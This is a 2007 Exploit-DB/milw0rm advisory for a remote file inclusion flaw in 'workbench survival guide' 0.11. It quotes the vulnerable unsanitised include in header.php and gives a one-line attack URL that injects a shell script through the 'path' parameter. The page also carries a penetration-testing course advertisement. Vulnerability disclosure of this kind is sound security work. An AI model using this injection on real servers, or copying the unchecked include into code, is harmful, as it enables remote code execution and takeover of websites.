workbench 0.11 - 'header.php?path' Remote File Inclusion

EDB-ID:

3848




Platform:

PHP

Date:

2007-05-04


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

##############################################################################################
##############################################################################################
#workbench survival guide <=  Remote File Inclusion Vulnerability
#
#Coder:kezzap66345@hotmail.com
#
#Vuln Code
###################################################################################
#
#ERROR:header.php
#
#<td width="100" bgcolor="#9999cc"><?include("$path/navbar.php")?></td>
#
#BUG:
#
#Example:http://site.com/path/header.php?path=[[Sh3LL Script]]
#
#Script Download
#############################################################################
#http://sourceforge.net/projects/workbench/
#
#Original W3b
Site############################################################################
#
#http://workbench.sourceforge.net
#
#Special Thanks:##### x0r0n ##### ajan ##### siircicocuk
#####################################
##############################################################################################
##############################################################################################

# milw0rm.com [2007-05-04]